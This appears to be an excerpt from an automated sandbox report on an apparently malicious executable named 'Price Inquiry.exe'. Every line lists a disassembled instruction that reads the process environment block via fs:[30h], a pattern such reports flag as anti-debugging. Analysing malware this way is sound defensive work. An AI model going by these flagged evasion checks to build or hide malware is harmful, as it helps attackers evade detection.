Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA2C3 mov eax, dword ptr fs:[00000030h]	4_2_016DA2C3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA2C3 mov eax, dword ptr fs:[00000030h]	4_2_016DA2C3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA2C3 mov eax, dword ptr fs:[00000030h]	4_2_016DA2C3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA2C3 mov eax, dword ptr fs:[00000030h]	4_2_016DA2C3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA2C3 mov eax, dword ptr fs:[00000030h]	4_2_016DA2C3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017662A0 mov eax, dword ptr fs:[00000030h]	4_2_017662A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017662A0 mov ecx, dword ptr fs:[00000030h]	4_2_017662A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017662A0 mov eax, dword ptr fs:[00000030h]	4_2_017662A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017662A0 mov eax, dword ptr fs:[00000030h]	4_2_017662A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017662A0 mov eax, dword ptr fs:[00000030h]	4_2_017662A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017662A0 mov eax, dword ptr fs:[00000030h]	4_2_017662A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E284 mov eax, dword ptr fs:[00000030h]	4_2_0170E284
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E284 mov eax, dword ptr fs:[00000030h]	4_2_0170E284
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01750283 mov eax, dword ptr fs:[00000030h]	4_2_01750283
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01750283 mov eax, dword ptr fs:[00000030h]	4_2_01750283
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01750283 mov eax, dword ptr fs:[00000030h]	4_2_01750283
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170656A mov eax, dword ptr fs:[00000030h]	4_2_0170656A
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170656A mov eax, dword ptr fs:[00000030h]	4_2_0170656A
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170656A mov eax, dword ptr fs:[00000030h]	4_2_0170656A
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8550 mov eax, dword ptr fs:[00000030h]	4_2_016D8550
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8550 mov eax, dword ptr fs:[00000030h]	4_2_016D8550
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE53E mov eax, dword ptr fs:[00000030h]	4_2_016FE53E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE53E mov eax, dword ptr fs:[00000030h]	4_2_016FE53E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE53E mov eax, dword ptr fs:[00000030h]	4_2_016FE53E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE53E mov eax, dword ptr fs:[00000030h]	4_2_016FE53E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE53E mov eax, dword ptr fs:[00000030h]	4_2_016FE53E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0535 mov eax, dword ptr fs:[00000030h]	4_2_016E0535
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0535 mov eax, dword ptr fs:[00000030h]	4_2_016E0535
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0535 mov eax, dword ptr fs:[00000030h]	4_2_016E0535
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0535 mov eax, dword ptr fs:[00000030h]	4_2_016E0535
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0535 mov eax, dword ptr fs:[00000030h]	4_2_016E0535
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0535 mov eax, dword ptr fs:[00000030h]	4_2_016E0535
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01766500 mov eax, dword ptr fs:[00000030h]	4_2_01766500
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017A4500 mov eax, dword ptr fs:[00000030h]	4_2_017A4500
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017A4500 mov eax, dword ptr fs:[00000030h]	4_2_017A4500
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017A4500 mov eax, dword ptr fs:[00000030h]	4_2_017A4500
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017A4500 mov eax, dword ptr fs:[00000030h]	4_2_017A4500
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017A4500 mov eax, dword ptr fs:[00000030h]	4_2_017A4500
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017A4500 mov eax, dword ptr fs:[00000030h]	4_2_017A4500
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017A4500 mov eax, dword ptr fs:[00000030h]	4_2_017A4500
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE5E7 mov eax, dword ptr fs:[00000030h]	4_2_016FE5E7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE5E7 mov eax, dword ptr fs:[00000030h]	4_2_016FE5E7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE5E7 mov eax, dword ptr fs:[00000030h]	4_2_016FE5E7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE5E7 mov eax, dword ptr fs:[00000030h]	4_2_016FE5E7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE5E7 mov eax, dword ptr fs:[00000030h]	4_2_016FE5E7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE5E7 mov eax, dword ptr fs:[00000030h]	4_2_016FE5E7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE5E7 mov eax, dword ptr fs:[00000030h]	4_2_016FE5E7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FE5E7 mov eax, dword ptr fs:[00000030h]	4_2_016FE5E7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D25E0 mov eax, dword ptr fs:[00000030h]	4_2_016D25E0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170C5ED mov eax, dword ptr fs:[00000030h]	4_2_0170C5ED
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170C5ED mov eax, dword ptr fs:[00000030h]	4_2_0170C5ED
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170A5D0 mov eax, dword ptr fs:[00000030h]	4_2_0170A5D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170A5D0 mov eax, dword ptr fs:[00000030h]	4_2_0170A5D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D65D0 mov eax, dword ptr fs:[00000030h]	4_2_016D65D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E5CF mov eax, dword ptr fs:[00000030h]	4_2_0170E5CF
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E5CF mov eax, dword ptr fs:[00000030h]	4_2_0170E5CF
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017505A7 mov eax, dword ptr fs:[00000030h]	4_2_017505A7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017505A7 mov eax, dword ptr fs:[00000030h]	4_2_017505A7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017505A7 mov eax, dword ptr fs:[00000030h]	4_2_017505A7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F45B1 mov eax, dword ptr fs:[00000030h]	4_2_016F45B1
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F45B1 mov eax, dword ptr fs:[00000030h]	4_2_016F45B1
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E59C mov eax, dword ptr fs:[00000030h]	4_2_0170E59C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D2582 mov eax, dword ptr fs:[00000030h]	4_2_016D2582
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D2582 mov ecx, dword ptr fs:[00000030h]	4_2_016D2582
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01704588 mov eax, dword ptr fs:[00000030h]	4_2_01704588
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175C460 mov ecx, dword ptr fs:[00000030h]	4_2_0175C460
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FA470 mov eax, dword ptr fs:[00000030h]	4_2_016FA470
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FA470 mov eax, dword ptr fs:[00000030h]	4_2_016FA470
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016FA470 mov eax, dword ptr fs:[00000030h]	4_2_016FA470
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016C645D mov eax, dword ptr fs:[00000030h]	4_2_016C645D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E443 mov eax, dword ptr fs:[00000030h]	4_2_0170E443
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E443 mov eax, dword ptr fs:[00000030h]	4_2_0170E443
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E443 mov eax, dword ptr fs:[00000030h]	4_2_0170E443
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E443 mov eax, dword ptr fs:[00000030h]	4_2_0170E443
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E443 mov eax, dword ptr fs:[00000030h]	4_2_0170E443
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E443 mov eax, dword ptr fs:[00000030h]	4_2_0170E443
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E443 mov eax, dword ptr fs:[00000030h]	4_2_0170E443
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170E443 mov eax, dword ptr fs:[00000030h]	4_2_0170E443
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F245A mov eax, dword ptr fs:[00000030h]	4_2_016F245A
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170A430 mov eax, dword ptr fs:[00000030h]	4_2_0170A430
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CC427 mov eax, dword ptr fs:[00000030h]	4_2_016CC427
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CE420 mov eax, dword ptr fs:[00000030h]	4_2_016CE420
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CE420 mov eax, dword ptr fs:[00000030h]	4_2_016CE420
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016CE420 mov eax, dword ptr fs:[00000030h]	4_2_016CE420
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01756420 mov eax, dword ptr fs:[00000030h]	4_2_01756420
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01756420 mov eax, dword ptr fs:[00000030h]	4_2_01756420
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01756420 mov eax, dword ptr fs:[00000030h]	4_2_01756420
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01756420 mov eax, dword ptr fs:[00000030h]	4_2_01756420
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01756420 mov eax, dword ptr fs:[00000030h]	4_2_01756420
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01756420 mov eax, dword ptr fs:[00000030h]	4_2_01756420
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01756420 mov eax, dword ptr fs:[00000030h]	4_2_01756420
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01708402 mov eax, dword ptr fs:[00000030h]	4_2_01708402
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01708402 mov eax, dword ptr fs:[00000030h]	4_2_01708402
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01708402 mov eax, dword ptr fs:[00000030h]	4_2_01708402
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D04E5 mov ecx, dword ptr fs:[00000030h]	4_2_016D04E5
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017044B0 mov ecx, dword ptr fs:[00000030h]	4_2_017044B0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175A4B0 mov eax, dword ptr fs:[00000030h]	4_2_0175A4B0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D64AB mov eax, dword ptr fs:[00000030h]	4_2_016D64AB
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D8770 mov eax, dword ptr fs:[00000030h]	4_2_016D8770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770 mov eax, dword ptr fs:[00000030h]	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770 mov eax, dword ptr fs:[00000030h]	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770 mov eax, dword ptr fs:[00000030h]	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770 mov eax, dword ptr fs:[00000030h]	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770 mov eax, dword ptr fs:[00000030h]	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770 mov eax, dword ptr fs:[00000030h]	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770 mov eax, dword ptr fs:[00000030h]	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770 mov eax, dword ptr fs:[00000030h]	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770 mov eax, dword ptr fs:[00000030h]	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770 mov eax, dword ptr fs:[00000030h]	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770 mov eax, dword ptr fs:[00000030h]	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E0770 mov eax, dword ptr fs:[00000030h]	4_2_016E0770
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01754755 mov eax, dword ptr fs:[00000030h]	4_2_01754755
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712750 mov eax, dword ptr fs:[00000030h]	4_2_01712750
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712750 mov eax, dword ptr fs:[00000030h]	4_2_01712750
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175E75D mov eax, dword ptr fs:[00000030h]	4_2_0175E75D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D0750 mov eax, dword ptr fs:[00000030h]	4_2_016D0750
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170674D mov esi, dword ptr fs:[00000030h]	4_2_0170674D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170674D mov eax, dword ptr fs:[00000030h]	4_2_0170674D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170674D mov eax, dword ptr fs:[00000030h]	4_2_0170674D
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174C730 mov eax, dword ptr fs:[00000030h]	4_2_0174C730
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170273C mov eax, dword ptr fs:[00000030h]	4_2_0170273C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170273C mov ecx, dword ptr fs:[00000030h]	4_2_0170273C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170273C mov eax, dword ptr fs:[00000030h]	4_2_0170273C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170C720 mov eax, dword ptr fs:[00000030h]	4_2_0170C720
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170C720 mov eax, dword ptr fs:[00000030h]	4_2_0170C720
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01700710 mov eax, dword ptr fs:[00000030h]	4_2_01700710
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170C700 mov eax, dword ptr fs:[00000030h]	4_2_0170C700
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D0710 mov eax, dword ptr fs:[00000030h]	4_2_016D0710
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F27ED mov eax, dword ptr fs:[00000030h]	4_2_016F27ED
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F27ED mov eax, dword ptr fs:[00000030h]	4_2_016F27ED
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F27ED mov eax, dword ptr fs:[00000030h]	4_2_016F27ED
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175E7E1 mov eax, dword ptr fs:[00000030h]	4_2_0175E7E1
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D47FB mov eax, dword ptr fs:[00000030h]	4_2_016D47FB
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D47FB mov eax, dword ptr fs:[00000030h]	4_2_016D47FB
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DC7C0 mov eax, dword ptr fs:[00000030h]	4_2_016DC7C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017507C3 mov eax, dword ptr fs:[00000030h]	4_2_017507C3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D07AF mov eax, dword ptr fs:[00000030h]	4_2_016D07AF
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017847A0 mov eax, dword ptr fs:[00000030h]	4_2_017847A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0177678E mov eax, dword ptr fs:[00000030h]	4_2_0177678E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01702674 mov eax, dword ptr fs:[00000030h]	4_2_01702674
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170A660 mov eax, dword ptr fs:[00000030h]	4_2_0170A660
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170A660 mov eax, dword ptr fs:[00000030h]	4_2_0170A660
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179866E mov eax, dword ptr fs:[00000030h]	4_2_0179866E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179866E mov eax, dword ptr fs:[00000030h]	4_2_0179866E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EC640 mov eax, dword ptr fs:[00000030h]	4_2_016EC640
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D262C mov eax, dword ptr fs:[00000030h]	4_2_016D262C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016EE627 mov eax, dword ptr fs:[00000030h]	4_2_016EE627
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01706620 mov eax, dword ptr fs:[00000030h]	4_2_01706620
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01708620 mov eax, dword ptr fs:[00000030h]	4_2_01708620
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E260B mov eax, dword ptr fs:[00000030h]	4_2_016E260B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E260B mov eax, dword ptr fs:[00000030h]	4_2_016E260B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E260B mov eax, dword ptr fs:[00000030h]	4_2_016E260B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E260B mov eax, dword ptr fs:[00000030h]	4_2_016E260B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E260B mov eax, dword ptr fs:[00000030h]	4_2_016E260B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E260B mov eax, dword ptr fs:[00000030h]	4_2_016E260B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E260B mov eax, dword ptr fs:[00000030h]	4_2_016E260B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01712619 mov eax, dword ptr fs:[00000030h]	4_2_01712619
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174E609 mov eax, dword ptr fs:[00000030h]	4_2_0174E609
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017506F1 mov eax, dword ptr fs:[00000030h]	4_2_017506F1
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017506F1 mov eax, dword ptr fs:[00000030h]	4_2_017506F1
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0174E6F2
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0174E6F2
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0174E6F2
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0174E6F2
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170A6C7 mov ebx, dword ptr fs:[00000030h]	4_2_0170A6C7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170A6C7 mov eax, dword ptr fs:[00000030h]	4_2_0170A6C7
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017066B0 mov eax, dword ptr fs:[00000030h]	4_2_017066B0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0170C6A6 mov eax, dword ptr fs:[00000030h]	4_2_0170C6A6
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D4690 mov eax, dword ptr fs:[00000030h]	4_2_016D4690
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D4690 mov eax, dword ptr fs:[00000030h]	4_2_016D4690
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175C97C mov eax, dword ptr fs:[00000030h]	4_2_0175C97C
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F6962 mov eax, dword ptr fs:[00000030h]	4_2_016F6962
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F6962 mov eax, dword ptr fs:[00000030h]	4_2_016F6962
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016F6962 mov eax, dword ptr fs:[00000030h]	4_2_016F6962
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01774978 mov eax, dword ptr fs:[00000030h]	4_2_01774978
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01774978 mov eax, dword ptr fs:[00000030h]	4_2_01774978
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0171096E mov eax, dword ptr fs:[00000030h]	4_2_0171096E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0171096E mov edx, dword ptr fs:[00000030h]	4_2_0171096E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0171096E mov eax, dword ptr fs:[00000030h]	4_2_0171096E
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_01750946 mov eax, dword ptr fs:[00000030h]	4_2_01750946
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0176892B mov eax, dword ptr fs:[00000030h]	4_2_0176892B
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175892A mov eax, dword ptr fs:[00000030h]	4_2_0175892A
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175C912 mov eax, dword ptr fs:[00000030h]	4_2_0175C912
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016C8918 mov eax, dword ptr fs:[00000030h]	4_2_016C8918
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016C8918 mov eax, dword ptr fs:[00000030h]	4_2_016C8918
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174E908 mov eax, dword ptr fs:[00000030h]	4_2_0174E908
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0174E908 mov eax, dword ptr fs:[00000030h]	4_2_0174E908
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017029F9 mov eax, dword ptr fs:[00000030h]	4_2_017029F9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017029F9 mov eax, dword ptr fs:[00000030h]	4_2_017029F9
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0175E9E0 mov eax, dword ptr fs:[00000030h]	4_2_0175E9E0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017049D0 mov eax, dword ptr fs:[00000030h]	4_2_017049D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_0179A9D3 mov eax, dword ptr fs:[00000030h]	4_2_0179A9D3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017669C0 mov eax, dword ptr fs:[00000030h]	4_2_017669C0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA9D0 mov eax, dword ptr fs:[00000030h]	4_2_016DA9D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA9D0 mov eax, dword ptr fs:[00000030h]	4_2_016DA9D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA9D0 mov eax, dword ptr fs:[00000030h]	4_2_016DA9D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA9D0 mov eax, dword ptr fs:[00000030h]	4_2_016DA9D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA9D0 mov eax, dword ptr fs:[00000030h]	4_2_016DA9D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016DA9D0 mov eax, dword ptr fs:[00000030h]	4_2_016DA9D0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D09AD mov eax, dword ptr fs:[00000030h]	4_2_016D09AD
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016D09AD mov eax, dword ptr fs:[00000030h]	4_2_016D09AD
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017589B3 mov esi, dword ptr fs:[00000030h]	4_2_017589B3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017589B3 mov eax, dword ptr fs:[00000030h]	4_2_017589B3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_017589B3 mov eax, dword ptr fs:[00000030h]	4_2_017589B3
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
Source: C:\Users\user\Desktop\Price Inquiry.exe	Code function: 4_2_016E29A0 mov eax, dword ptr fs:[00000030h]	4_2_016E29A0
